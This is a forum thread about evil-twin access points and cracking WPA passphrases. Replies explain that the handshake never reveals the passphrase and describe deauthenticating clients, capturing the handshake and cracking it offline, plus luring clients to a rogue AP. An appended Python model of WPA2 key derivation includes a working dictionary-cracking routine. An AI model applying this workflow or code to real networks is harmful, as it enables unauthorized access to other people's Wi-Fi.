
Thread: ap spoof

  1. #1
    7ELEVEN
    Guest

    ap spoof

    OK, so I was looking at a few other posts that almost came close to what I wanted to do.

    Instead of cracking a WPA password I want to:

    Use mdk3 to set up an exact clone of my test AP, deauth all clients from the real AP, and make it so no one can connect back to the real AP... so after a while they're going to see my clone AP with their SSID and try to connect using the WPA passphrase of the original AP. Then I collect that in a plain-text file somehow?

    Is this being done already?

    If so, can someone give me some examples?

  2. #2
    Member (joined Apr 2007, 155 posts)


    Silly person, you can do that and have fun with it, but you AREN'T going to get a WPA password in plaintext; it's sent using the WPA encryption scheme, making all that work to get the targets to connect to you a waste of time when you can get the same data by just disconnecting them and sniffing for a second.
    This is a hacker's forum :P
    root ~# aircrack-ng pwnd-01.cap
    Lenovo Thinkpad R500, OS: Ubuntu 8.10, BackTrack3, Windows XP (VirtualBox), Windows Vista, Windows 7 beta

  3. #3
    7ELEVEN
    Guest

    ok

    Quote Originally Posted by Shavx:
    > you can get the same data by just disconnecting them and sniffing for a second.

    So is there a way to decode that info to get the passphrase? Is this where the dictionary or rainbow-table brute force comes in?

  4. #4


    Quote Originally Posted by 7ELEVEN:
    > So is there a way to decode that info to get the passphrase? Is this where the dictionary or rainbow-table brute force comes in?

    Yes, that is where the dictionary brute force or the cowpatty-type hash database comes in. Deauth a connected client, capture the 4 EAPOL packets that are transmitted between the AP and client when they attempt to reauthenticate, and then use something like aircrack-ng or cowpatty to crack the WPA passphrase. The only WPA authentication scheme this won't work against is if the AP/client are using some kind of 802.1X scheme (also known as WPA Enterprise) such as RADIUS. I'm pretty sure there are a couple of threads on this forum about how to do this in detail. Just search for "WPA cracking".

    Good Luck...

  5. #5
    Senior Member (joined Apr 2008, 2,008 posts)


    Quote Originally Posted by 7ELEVEN:
    > So is there a way to decode that info to get the passphrase? Is this where the dictionary or rainbow-table brute force comes in?

    In other words, the approach you are describing will not provide you with a shortcut to obtain the WPA passphrase. The handshake is exchanged in 4 steps, and without already knowing the passphrase you will not be able to even perform a full authentication, let alone get the passphrase in plain text.

    The alternative method, which actually is possible and is discussed in the other thread, is to use airbase-ng to lure a client into connecting to your unencrypted AP instead of his own and then use an exploit to obtain the key from his registry.
    -Monkeys are like nature's humans.
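    The two answers above (#4 and #5) make the same point from opposite sides: the 4-way handshake never carries the passphrase, only nonces and a MIC keyed by material derived from it, which is why a rogue AP collects nothing in plaintext, and why a sniffed handshake can still be attacked offline by guessing. The following is an added example (not code from this thread, nor from aircrack-ng or cowpatty) that models WPA2-Personal/CCMP key derivation and the EAPOL-Key MIC check, fakes a "captured" message 2 from a known passphrase, and then runs the dictionary attack that recovers it. The SSID, MAC addresses, nonces and passphrase are constructed values; the frame layout is the standard EAPOL-Key format with the MIC at byte offset 81.

```python
"""Model of why a captured WPA2-Personal handshake is crackable offline
but never leaks the passphrase. Constructed example: the 'captured'
message 2 is generated locally from a known passphrase."""
import hashlib
import hmac
from typing import Optional

EAPOL_MIC_OFFSET = 81   # MIC field occupies bytes 81..96 of an EAPOL-Key frame
EAPOL_MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make each dictionary guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus both MACs and both nonces; all of those go over the air."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP EAPOL-Key MIC: first 16 bytes of HMAC-SHA1 over the frame with MIC zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:EAPOL_MIC_LEN]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Assemble a minimal EAPOL-Key message 2 (client -> AP): SNonce plus MIC, no key data."""
    hdr = bytes([0x02, 0x03]) + (95).to_bytes(2, "big")   # 802.1X v2, EAPOL-Key, body length
    body = (
        bytes([0x02])                      # descriptor type: RSN
        + (0x010A).to_bytes(2, "big")      # key info: pairwise, MIC present, HMAC-SHA1 version
        + (16).to_bytes(2, "big")          # key length (CCMP)
        + (1).to_bytes(8, "big")           # replay counter
        + snonce                           # 32-byte supplicant nonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID (unused here)
        + mic                              # 16-byte MIC
        + (0).to_bytes(2, "big")           # key data length
    )
    frame = hdr + body
    assert len(frame) == 99 and frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + EAPOL_MIC_LEN] == mic
    return frame


def build_sample_handshake(passphrase: str, ssid: str) -> dict:
    """What a sniffer sees when a client re-associates after a deauth: both MACs,
    the ANonce (message 1) and message 2 carrying the SNonce and a MIC.
    The passphrase itself appears nowhere in the capture."""
    aa = bytes.fromhex("00112233aabb")     # AP BSSID (constructed)
    spa = bytes.fromhex("66778899ccdd")    # client MAC (constructed)
    anonce = bytes(range(32))              # fixed nonces so the example is reproducible
    snonce = bytes(range(32, 64))
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]   # KCK = first 128 bits of PTK
    msg2 = build_eapol_msg2(snonce, eapol_mic(kck, build_eapol_msg2(snonce)))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "msg2": msg2}


def crack_handshake(capture: dict, wordlist) -> Optional[str]:
    """The offline attack: guess -> PMK -> PTK -> KCK -> MIC, compare with the sniffed MIC."""
    msg2 = capture["msg2"]
    seen_mic = msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + EAPOL_MIC_LEN]
    zeroed = msg2[:EAPOL_MIC_OFFSET] + bytes(EAPOL_MIC_LEN) + msg2[EAPOL_MIC_OFFSET + EAPOL_MIC_LEN:]
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), seen_mic):
            return guess
    return None


if __name__ == "__main__":
    cap = build_sample_handshake("correct horse battery", "TestAP")
    print("passphrase present in capture:", b"correct horse battery" in cap["msg2"])
    print("cracked:", crack_handshake(cap, ["password", "letmein", "correct horse battery"]))
```

    Two things the model makes concrete: the MIC is the only passphrase-dependent field that crosses the air, so a cloned AP that talks to the client learns nothing it could not also sniff passively; and every guess costs a 4096-iteration PBKDF2, which is the cost that precomputed hash tables (the cowpatty/genpmk approach mentioned in #3 and #4) amortise per SSID.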
